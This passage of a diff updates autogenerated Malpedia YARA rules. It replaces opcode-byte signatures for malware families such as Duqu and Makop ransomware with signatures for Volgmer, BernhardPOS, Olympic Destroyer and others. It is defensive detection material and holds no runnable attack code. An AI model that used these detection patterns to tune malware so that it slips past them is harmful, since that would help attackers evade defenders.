+		$sequence_6 = { 5b 81c4a0030000 c3 6a00 8d4c2428 6a00 }
+		$sequence_7 = { c3 8b0d???????? 8d542404 52 8b542410 }
+		$sequence_8 = { 57 6af6 ff15???????? 8b35???????? 8bf8 8d442408 }
+		$sequence_9 = { 6a3f eb0b a1???????? 83c020 50 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 1143808
 }
-rule MALPEDIA_Win_Jolob_Auto : FILE
+rule MALPEDIA_Win_Moriagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ef72678c-e4af-5ecd-a17f-38938f34b802"
+		id = "8ea17c80-9deb-5afe-98a3-751e4ae48a8a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jolob_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moriagent_auto.yar#L1-L152"
 		license_url = "N/A"
-		logic_hash = "6d14d1852edd7575113d6514e73e7231e52f26da3a40217ee521425b76e2e32f"
+		logic_hash = "b07e11158ac51efd9de0395dc805b23dd409bb1c9d15248d2eea5cac8417e1fb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117940,34 +118349,39 @@ rule MALPEDIA_Win_Jolob_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff75f0 8d45f8 50 ff7618 e8???????? 5f c9 }
-		$sequence_1 = { 881408 41 84d2 75f6 8d95fafeffff 8bc7 }
-		$sequence_2 = { 740b 50 ff15???????? 834b14ff c3 }
-		$sequence_3 = { 40 5f c9 c20800 8b06 83f8ff }
-		$sequence_4 = { 5f 8bc3 5b 64890d00000000 c9 c20400 53 }
-		$sequence_5 = { 34a3 8886de000000 8a86cf000000 34a6 8886df000000 83c610 56 }
-		$sequence_6 = { 83c004 83c704 83fe04 7ce4 33f6 }
-		$sequence_7 = { 75f8 8d442420 50 ff730c e8???????? 85c0 74c3 }
-		$sequence_8 = { 0fafc1 894634 ff15???????? 8bf8 897e40 3bfb }
-		$sequence_9 = { 8a5415e4 885405f4 40 46 3bc3 7ceb ff4d08 }
+		$sequence_0 = { b802000000 eb05 b801000000 33ff }
+		$sequence_1 = { 8d8d84efffff e9???????? 8b542408 8d420c 8b8ab0eeffff }
+		$sequence_2 = { e8???????? 488bd8 488d15b5630600 488bcf }
+		$sequence_3 = { 7202 8b12 8bca c78540ffffff00000000 c78544ffffff0f000000 c68530ffffff00 8d7101 }
+		$sequence_4 = { 8d041e 2bfe 57 ff75fc 2bdf 894104 }
+		$sequence_5 = { 8d47ff 880e 46 eb0c b802000000 }
+		$sequence_6 = { e8???????? 488bd8 488d15c4320500 488d8da0000000 }
+		$sequence_7 = { e8???????? 488bd8 488d15bb6d0500 488d4d28 }
+		$sequence_8 = { e8???????? 488bd8 488d15cdae0600 488bcf }
+		$sequence_9 = { e8???????? 488bd8 488d15cc390500 488d4d58 }
+		$sequence_10 = { 83fa10 0f82c6feffff 8b8d84efffff 42 }
+		$sequence_11 = { 2bc1 83c0fc 83f81f 0f87a9020000 52 51 }
+		$sequence_12 = { e8???????? 488bd8 488d15b2780500 488d4d28 e8???????? }
+		$sequence_13 = { 0f438d6cefffff 898dfceeffff 3bf8 731d 2bc7 50 8d0439 }
+		$sequence_14 = { e8???????? 488bd8 488d15caad0600 488bcf }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 1347904
 }
-rule MALPEDIA_Win_Ghostemperor_Auto : FILE
+rule MALPEDIA_Win_Turian_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f7621211-4b28-566a-b3ea-8ff428be0537"
+		id = "762c542d-5fa6-5b48-a3af-f444b4ed2d2f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ghostemperor_auto.yar#L1-L213"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turian"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.turian_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "52e1433fc52738b98f2cb3208f8e4210fe3ef53162cc193cfeb7b527c13f1b16"
+		logic_hash = "64a5758bdf29fcbe94dd0cd69166b022a26376fc8e3a37014e6d93a76d08b3ce"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -117979,45 +118393,32 @@ rule MALPEDIA_Win_Ghostemperor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7406 8b442424 eb0d c7442424ffffffff }
-		$sequence_1 = { 4183f802 743b 8a4802 41304902 }
-		$sequence_2 = { 0f1004fa 0f104cfa10 0f1014f9 0f57d0 0f1044f910 }
-		$sequence_3 = { 31d2 41b801000000 4531c9 ff15???????? }
-		$sequence_4 = { 488d5108 e8???????? 8b4648 85c0 746e 8b564c }
-		$sequence_5 = { 4c8b5c2408 4883c410 c3 ff25???????? ff25???????? ff25???????? ff25???????? }
-		$sequence_6 = { e8???????? 48c7471000000000 eb09 c7471800000000 }
-		$sequence_7 = { 44894648 49c1e003 488d5108 e8???????? }
-		$sequence_8 = { 4889c3 448b4650 4403464c 49c1e003 4889c1 31d2 e8???????? }
-		$sequence_9 = { 66448974247c 448874247e 4885c0 0f84d8010000 c744242037008900 c74424246300ec00 }
-		$sequence_10 = { 33d2 c745979b00a000 c7459b81009200 33db c7459ff600a600 }
-		$sequence_11 = { 48ffc0 664539644602 75f5 483bd8 }
-		$sequence_12 = { 488d4c2420 488d7d72 ff5008 488d4d72 }
-		$sequence_13 = { 01c1 89ca c1ea1f c1f904 }
-		$sequence_14 = { 00c2 488b8568020000 8854080c 488b85b0020000 }
-		$sequence_15 = { c744246064005a00 c744246458005a00 0f10442458 c74424682a00a900 }
-		$sequence_16 = { 00c1 488b8568020000 488b95b0020000 884c100c 488b85b0020000 488b85b0020000 488b85b0020000 }
-		$sequence_17 = { 4881ecf0010000 488d05ed1e0000 4533ff 488d4c2420 4889442420 }
-		$sequence_18 = { 0f1145c0 c7442458b4000500 c744245cb800a900 c7442460fb00b500 c74424641500fe00 }
-		$sequence_19 = { 01c3 69cbe8030000 81c130750000 4883ec20 }
-		$sequence_20 = { e9???????? b902000000 3bc1 0f85dc020000 498b7f18 }
-		$sequence_21 = { 01d1 89ca c1e205 89cb }
-		$sequence_22 = { 052797fa04 351337a665 8945f4 488b4510 }
+		$sequence_0 = { 8bf0 85f6 7405 83c605 }
+		$sequence_1 = { 5b 81c420040000 c3 8d4c2410 6a10 51 }
+		$sequence_2 = { 50 53 52 ff15???????? eb1b }
+		$sequence_3 = { bf???????? f3a5 668b15???????? 52 }
+		$sequence_4 = { 56 c1e105 03c8 57 8b7c2410 }
+		$sequence_5 = { 83c9ff 33c0 668b15???????? f2ae }
+		$sequence_6 = { 81c49c000000 c3 6a00 6a00 8d4c2424 688c000000 51 }
+		$sequence_7 = { 0f8502010000 8b1d???????? 8b2d???????? 8d442410 50 e8???????? 83c404 }
+		$sequence_8 = { 6a16 8901 8bd5 56 894104 }
+		$sequence_9 = { 52 49 baff000000 68???????? 2bd1 }
 
 	condition:
-		7 of them and filesize < 1115136
+		7 of them and filesize < 645120
 }
-rule MALPEDIA_Win_Duqu_Auto : FILE
+rule MALPEDIA_Win_Vigilant_Cleaner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "424302fc-6577-56a8-8823-f2003c48bc5c"
+		id = "95508716-6967-5a7f-8deb-f89ef52d51c8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.duqu_auto.yar#L1-L171"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vigilant_cleaner_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "c898aec26da15be1184cad51dbcbbea7d5de6c2fe0a6afa2af1a2af031fa3007"
+		logic_hash = "8f3ebf6c4c6a27d564cc935d377873205b5347edbbb627f3304dd27f1d14c8a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118031,40 +118432,34 @@ rule MALPEDIA_Win_Duqu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bd8 895c2414 85db 755b }
-		$sequence_1 = { 8bd7 84c0 74c7 33c9 3c2e }
-		$sequence_2 = { e8???????? 894624 85c0 0f8474020000 baf71ad500 8bcf }
-		$sequence_3 = { e8???????? ba2760f046 89463c 8bcf e8???????? 894640 85c0 }
-		$sequence_4 = { b9c64ff867 894c2424 8b07 03c6 c7442414ffff3f00 89442420 894c2418 }
-		$sequence_5 = { 56 51 8bf2 e8???????? }
-		$sequence_6 = { ba19729c9f 89461c 8bcb e8???????? ba4c1241f2 894630 }
-		$sequence_7 = { e8???????? ba56f0665d 894674 8bcb e8???????? ba244135d1 }
-		$sequence_8 = { ba0ded3515 8bcb e8???????? ba0b7bb6ba }
-		$sequence_9 = { 85c0 7465 e8???????? 85c0 }
-		$sequence_10 = { 8bec 51 57 33ff b9???????? }
-		$sequence_11 = { 8bec 51 66833d????????00 7429 }
-		$sequence_12 = { 8bec 51 a1???????? 56 57 6a28 }
-		$sequence_13 = { 8bec 51 53 56 be???????? 57 33db }
-		$sequence_14 = { 8bec 51 6a00 8d45fc 50 6a04 }
-		$sequence_15 = { 8bec 51 56 57 894dfc 8bfa b22e }
+		$sequence_0 = { ba58560000 ed 5b 59 5a }
+		$sequence_1 = { b90a000000 ba58560000 ed 5b }
+		$sequence_2 = { bb00000000 b90a000000 ba58560000 ed 5b }
+		$sequence_3 = { bb00000000 b90a000000 ba58560000 ed 5b 59 5a }
+		$sequence_4 = { 53 b868584d56 bb00000000 b90a000000 ba58560000 ed 5b }
+		$sequence_5 = { bb00000000 b90a000000 ba58560000 ed 5b 59 }
+		$sequence_6 = { ed 5b 59 5a }
+		$sequence_7 = { b90a000000 ba58560000 ed 5b 59 5a }
+		$sequence_8 = { b90a000000 ba58560000 ed 5b 59 }
+		$sequence_9 = { b868584d56 bb00000000 b90a000000 ba58560000 ed 5b }
 
 	condition:
-		7 of them and filesize < 18759680
+		7 of them and filesize < 1181696
 }
-rule MALPEDIA_Win_Rerdom_Auto : FILE
+rule MALPEDIA_Win_Volgmer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fe806d9a-6a04-5e79-b88b-ee8b8a204978"
+		id = "ee14de89-49ac-54c0-9028-7fc3ec1ece55"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rerdom_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.volgmer_auto.yar#L1-L404"
 		license_url = "N/A"
-		logic_hash = "a2ea86fac59908c343fcb877dddd42001d84b6d42ea05066c82f8a9e14242c06"
+		logic_hash = "e0462e79ef6280b8a6003ef7a899cec3de3d795edb85c7c6f37d83222de71a6b"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -118076,71 +118471,105 @@ rule MALPEDIA_Win_Rerdom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33f6 85ff 740d 8b04b3 e8???????? 46 3bf7 }
-		$sequence_1 = { 57 ba???????? 52 e8???????? 52 ff15???????? e8???????? }
-		$sequence_2 = { 8b3e 8bc3 e8???????? 8945fc 83f8ff 751a 85db }
-		$sequence_3 = { 8d44244c 50 ff15???????? 6a01 53 53 }
-		$sequence_4 = { 8bf0 58 c745f804000000 e8???????? 8bd0 8955f4 85d2 }
-		$sequence_5 = { 7576 8b4610 85c0 740a 8a00 3c0e 7404 }
-		$sequence_6 = { 6a0d 2bc6 5a 3bc2 7211 57 8bc2 }
-		$sequence_7 = { ff7508 e8???????? 3bc7 0f85c4000000 8b450c 85c0 0f84b9000000 }
-		$sequence_8 = { 6a01 8d45cc e8???????? 84c0 0f84ab010000 8975fc 8975f8 }
-		$sequence_9 = { ffd7 53 ffd6 8325????????00 ff74241c ffd7 ff74241c }
+		$sequence_0 = { 4533c0 498bd5 33c9 c744242800000008 }
+		$sequence_1 = { 0f298d100c0000 668985200c0000 e8???????? 0f2805???????? 488d8d270d0000 0f280d???????? }
+		$sequence_2 = { 33ed bb01000000 896c2424 448bf7 85db }
+		$sequence_3 = { 488bcb ff542468 8bc6 4c8bb42448180000 4c8ba42488180000 }
+		$sequence_4 = { e8???????? e8???????? e8???????? c705????????04000000 }
+		$sequence_5 = { 85c0 0f84b2000000 458bc7 498bd6 488bcb e8???????? }
+		$sequence_6 = { 4489742420 440fb7c6 488d9550030000 488d8d60040000 }
+		$sequence_7 = { 4489742420 448bc5 488bce 85c0 742f }
+		$sequence_8 = { 41b802010000 e8???????? 33d2 c7453078292e4c }
+		$sequence_9 = { 0fb6840dd0060000 88840de0070000 488d4901 84c0 75e9 }
+		$sequence_10 = { e8???????? 483b3d???????? 741a 488d0535e30000 }
+		$sequence_11 = { 7417 8b85d0f3ffff 85c0 740d 6a00 ffb5d4f3ffff 50 }
+		$sequence_12 = { 8bf7 897c2448 897c244c 897c2458 44896c245c }
+		$sequence_13 = { e8???????? 4585ed 7417 0fb7555b }
+		$sequence_14 = { eb0e c74634047b6e00 c7463806000000 c6463c00 5f }
+		$sequence_15 = { 56 e8???????? 6800010000 8d8318020000 6a00 50 }
+		$sequence_16 = { e8???????? 4881c448010000 415f 415e 415d 5e }
+		$sequence_17 = { c745e0f8ba6e00 e9???????? c745e0e4ba6e00 e9???????? c745dc02000000 c745e0e4ba6e00 8b4508 }
+		$sequence_18 = { c745e4e47d6e00 8945d4 83e302 8945d8 8945e8 8945f8 8b4508 }
+		$sequence_19 = { c1f906 6bd730 8b0c8d80f16e00 c644112800 85f6 740c }
+		$sequence_20 = { 458d4505 488d542440 4983ccff 498bce }
+		$sequence_21 = { 83c40c 8bcb e8???????? 8dbb18030000 57 8d85c8feffff 50 }
+		$sequence_22 = { 4803c8 0fb6442450 6603d2 0fb7da f6d0 89542430 }
+		$sequence_23 = { 6bc930 53 56 8b048580f16e00 33db 8b7508 57 }
+		$sequence_24 = { c783240f000010000000 0f1106 0f1f4000 880438 40 }
+		$sequence_25 = { e8???????? 488d15b6e50100 488bcb 488905???????? e8???????? 488d15b0e50100 }
+		$sequence_26 = { 53 57 ff15???????? 85c0 750a ff15???????? 89442414 }
+		$sequence_27 = { 0f850a010000 498d4c2410 4c8d442458 488d542458 }
+		$sequence_28 = { 7413 668908 83c002 4a 75ee 83e802 66c7000000 }
+		$sequence_29 = { 8d542444 68???????? 52 ff15???????? 85c0 747e 8d442444 }
+		$sequence_30 = { 57 e8???????? 8bf0 83c408 85f6 7518 397310 }
+		$sequence_31 = { 8d8318030000 6a00 50 e8???????? 6800080000 8d831c040000 6a00 }
+		$sequence_32 = { eb1a 8d45fc 50 8b04bd80f16e00 }
+		$sequence_33 = { e8???????? 458d4578 33d2 488bcf }
+		$sequence_34 = { 8a2f 33c0 668945e8 8b45d4 886de5 8b148580f16e00 8a4c1a2d }
+		$sequence_35 = { e8???????? eb05 be9effffff 8b542410 }
+		$sequence_36 = { 51 8b4c2428 e8???????? 6a00 6a00 }
+		$sequence_37 = { 0f849f000000 807d9717 0f8595000000 b801030000 }
+		$sequence_38 = { 4883c702 48894511 48894519 48894521 48894529 }
+		$sequence_39 = { e8???????? 6800040000 8985ccf5ffff 0f57c0 8d85d0f9ffff c645d000 }
+		$sequence_40 = { 8bc8 83e03f c1f906 6bc030 03048d80f17300 50 }
+		$sequence_41 = { 761d 68204e0000 ff15???????? a1???????? }
+		$sequence_42 = { c1f806 6bc930 8b048580f16e00 0fb6440828 83e040 5d }
+		$sequence_43 = { e8???????? 4881c450010000 415d 5b }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 393216
 }
-rule MALPEDIA_Win_Makop_Ransomware_Auto : FILE
+rule MALPEDIA_Win_Bernhardpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cd34e745-9497-5ffc-bd73-ecb5996e2067"
-		date = "2023-07-11"
-		modified = "2023-07-15"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.makop_ransomware_auto.yar#L1-L124"
+		id = "e53bca0c-e390-5052-8af3-50fac1bc5855"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bernhardpos_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "3c7cc3419f322a8e9eb8473ecaf54fc5da0725e8a0f35ff3f90245e28389848b"
+		logic_hash = "1e1ede6b562cb821e225ab092cfdf0abf71f1c6115a9127ed5d67b3e3afac78f"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230705"
-		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
-		malpedia_version = "20230715"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb02 33f6 803d????????00 751f 803d????????00 7516 80fb01 }
-		$sequence_1 = { 52 50 51 e8???????? 8b542430 83c40c 68e0930400 }
-		$sequence_2 = { 52 66c7060802 66c746041066 c6460820 }
-		$sequence_3 = { 56 ff15???????? 85c0 750b 8906 32c0 5e }
-		$sequence_4 = { 83c001 84c9 75f7 2bc7 83e801 39442404 720a }
-		$sequence_5 = { ffd6 85ff 740f 85db 740b 837c242000 7404 }
-		$sequence_6 = { 8b2d???????? 3beb 742e 8b4524 3bc3 7407 50 }
-		$sequence_7 = { 7416 e8???????? 6a00 e8???????? 83c404 }
-		$sequence_8 = { e8???????? 8b442418 83c40c 8b4f0c }
-		$sequence_9 = { 742f 33c0 3906 763d 8d4c2448 }
+		$sequence_0 = { c1e806 83e03f 8b4d0c 034df4 8a9020544100 }
+		$sequence_1 = { 6815b43ed8 a1???????? 50 e8???????? }
+		$sequence_2 = { 0fbe5415f8 33ca 8b4508 0345f4 8808 ebc7 5f }
+		$sequence_3 = { c745f800000000 c745f400000000 8b45f8 3b45fc 0f831d010000 8b45f8 }
+		$sequence_4 = { ba04000000 c1e200 8b8415d4fdffff 50 }
+		$sequence_5 = { 8bec 83ec48 53 56 57 c745fc00000000 c745f800000000 }
+		$sequence_6 = { 83e863 5f 5e 5b }
+		$sequence_7 = { 8d85d0feffff 8985c8feffff 8d85c4feffff 50 6aff 68ff000000 }
+		$sequence_8 = { e8???????? a3???????? 68a86b4aa0 a1???????? 50 e8???????? }
+		$sequence_9 = { e8???????? 83c404 6a01 8d85d0feffff 50 ff15???????? }
 
 	condition:
-		7 of them and filesize < 107520
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Rc2Fm_Auto : FILE
+rule MALPEDIA_Win_Absentloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e03b7b3c-48a1-54e0-8e6b-e042d3ac2eec"
+		id = "4910d41c-fd9d-58f5-8e0b-80462a82048c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rc2fm_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.absentloader_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "fde85b529d09d7ff1cf9ced9923a8b91413b0ceeff762a4b8cd7ea6f3c6fcfbf"
+		logic_hash = "247d6cfb768e4552d66056adfd67fbf6ee95131ccc4d55998852773c9971750b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118154,34 +118583,34 @@ rule MALPEDIA_Win_Rc2Fm_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4d8bce 4c2b4e08 4533c0 33d2 488bcb 4c03c8 897c2428 }
-		$sequence_1 = { 48b8bd427ae5d594bfd6 48034c2450 41b903000000 4533c0 c744242808000000 48895c2420 48f7e1 }
-		$sequence_2 = { 488d451f 48899c24c0000000 33db 41b93f000f00 4533c0 4c89a42488000000 4889442420 }
-		$sequence_3 = { 03c1 46011c08 4883c202 49ffca 75c3 418b4004 4c03c0 }
-		$sequence_4 = { 488bcb e8???????? eb62 488d151bf9ffff 4c8bc3 e8???????? 84c0 }
-		$sequence_5 = { 66894503 0fb64500 4c897c2420 66894501 0fb645ff 668945ff ff15???????? }
-		$sequence_6 = { 894158 488b4168 66893c50 8b5174 488b4968 8d1455feffffff e8???????? }
-		$sequence_7 = { 41b808020000 4889b42488000000 ff15???????? 488bf0 4885c0 0f84b6010000 }
-		$sequence_8 = { ba0a000500 b900000100 448bc0 e8???????? 488b4c2450 488b01 ff5010 }
-		$sequence_9 = { ff15???????? 488bd8 4883f8ff 742d 33d2 488bc8 ff15???????? }
+		$sequence_0 = { 8d4ddc e8???????? 83c610 3bf7 75f0 8b7dc8 eb3c }
+		$sequence_1 = { 66c745f8722e 8b08 a1???????? 3b8104000000 7e33 56 be74a806fd }
+		$sequence_2 = { 0fb60438 8a88901a06fd 8ac2 c0e804 c0e102 0ac8 c0e204 }
+		$sequence_3 = { ff75f4 8b09 8b01 ff5004 5f 5e 5b }
+		$sequence_4 = { a5 e8???????? 59 59 8bf0 8b8d5cffffff 8d8520ffffff }
+		$sequence_5 = { 0f844c040000 8d4590 50 8d4ddc e8???????? 33d2 42 }
+		$sequence_6 = { e8???????? 833d????????ff 59 7520 8b45f4 68800705fd a3???????? }
+		$sequence_7 = { e8???????? 56 8d8d68faffff c645fc2e }
+		$sequence_8 = { 03cf 03c7 0fb70470 8b0481 8d8de4f3ffff 51 8d8df0f3ffff }
+		$sequence_9 = { 8b0c8de8a006fd 804c112802 5b 2bf7 83e6fe 5f 8bc6 }
 
 	condition:
-		7 of them and filesize < 410624
+		7 of them and filesize < 794624
 }
-rule MALPEDIA_Win_Greetingghoul_Auto : FILE
+rule MALPEDIA_Win_Olympic_Destroyer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "881721a5-e164-51b8-a287-1242b24b8d86"
+		id = "b177466d-4016-5e9b-b3ba-a9107347cf6f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greetingghoul"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.greetingghoul_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.olympic_destroyer_auto.yar#L1-L234"
 		license_url = "N/A"
-		logic_hash = "21010fe53cfb0bf5a0ef36b612c93204fe24237a4c71d13df9cbc88f88795750"
+		logic_hash = "fa50bc2589388652e3cccf0c3f51fa7fe6dd4219d5101d2a0cb0322727b90903"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -118193,32 +118622,45 @@ rule MALPEDIA_Win_Greetingghoul_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7405 80fa09 7503 47 ebec 8d4ad0 80f909 }
-		$sequence_1 = { 03f1 eb03 83ceff 8a17 84d2 }
-		$sequence_2 = { 2bc8 7409 8b7df8 4e 43 }
-		$sequence_3 = { 6a01 e8???????? 83c404 85c0 7e02 ff06 }
-		$sequence_4 = { eba7 5f 5e 83c8ff 5b }
-		$sequence_5 = { 750a 83c002 66833c0200 75e8 66833800 }
-		$sequence_6 = { 741b 83ea01 75e8 eb14 0fbe45ff }
-		$sequence_7 = { bb10000000 eb3c 80f909 7708 0fbec2 }
-		$sequence_8 = { 85c0 7405 83f8ff 7508 85ff }
-		$sequence_9 = { 8a08 3acb 750c 40 84c9 }
+		$sequence_0 = { 56 33c0 89542414 57 }
+		$sequence_1 = { 89442448 e8???????? 83c404 85c0 0f84e1010000 8d842494000000 }
+		$sequence_2 = { c70424???????? e8???????? bb???????? c70424???????? e8???????? bb???????? }
+		$sequence_3 = { 83c620 3b442418 72ba 8b742420 817c242403010000 }
+		$sequence_4 = { 83f807 77c4 ff248571335400 8bce e8???????? }
+		$sequence_5 = { 8bd6 897c2418 8906 e8???????? 83c404 85c0 7470 }
+		$sequence_6 = { 68???????? ba???????? e8???????? 83c418 85c0 0f84eb000000 a1???????? }
+		$sequence_7 = { 50 6a02 8bcf e8???????? 8b451c }
+		$sequence_8 = { 50 6a01 ff7510 e8???????? 83c41c 8bf0 807f4500 }
+		$sequence_9 = { 50 6a03 e8???????? 8b542440 }
+		$sequence_10 = { 6a28 50 ff15???????? 56 56 6a10 8d45ec }
+		$sequence_11 = { 50 6a02 ff75e4 ff15???????? 85c0 74c0 }
+		$sequence_12 = { 8d442424 ba09000000 50 8d4c2420 }
+		$sequence_13 = { 68???????? bb???????? e8???????? bb???????? c70424???????? e8???????? bb???????? }
+		$sequence_14 = { 8d85c0f9ffff 50 ffd7 85c0 747a ffb590f9ffff e8???????? }
+		$sequence_15 = { 6aff 6a04 6aff ff75ec 8945f0 }
+		$sequence_16 = { 50 6a05 6a00 ff742444 ff742438 }
+		$sequence_17 = { c744241cd0f25500 894c2424 c744242c00000000 751b }
+		$sequence_18 = { 0f85f5feffff ffb58cf9ffff ff15???????? 8b4df8 5f 5e 33cd }
+		$sequence_19 = { 56 8d85e4efffff 50 6a01 8d85f8efffff 50 }
+		$sequence_20 = { 50 6a01 ff742424 e8???????? 83c40c 8b7f08 }
+		$sequence_21 = { 8d542404 56 8bf1 e8???????? 85c0 7416 }
+		$sequence_22 = { 50 6a04 e8???????? 8b45fc 33d2 }
 
 	condition:
-		7 of them and filesize < 696320
+		7 of them and filesize < 1392640
 }
-rule MALPEDIA_Win_Manitsme_Auto : FILE
+rule MALPEDIA_Win_Nautilus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db884f68-52e3-535c-a75f-a98978605003"
+		id = "5820a14f-f3d2-5304-9417-3caef70672d9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.manitsme_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nautilus_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "272de9774cf5a8eb5198458ddf07f5bca3359e27fa527484a54e8b750a92c4ea"
+		logic_hash = "3519ef9bb4f52e1cd4586752506ba79e61c0e796a4c0e30324274e519044d1d2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118232,32 +118674,32 @@ rule MALPEDIA_Win_Manitsme_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7586 50 ff15???????? }
-		$sequence_1 = { 89742424 89742420 89742434 89742430 8974242c 89742428 6689742448 }
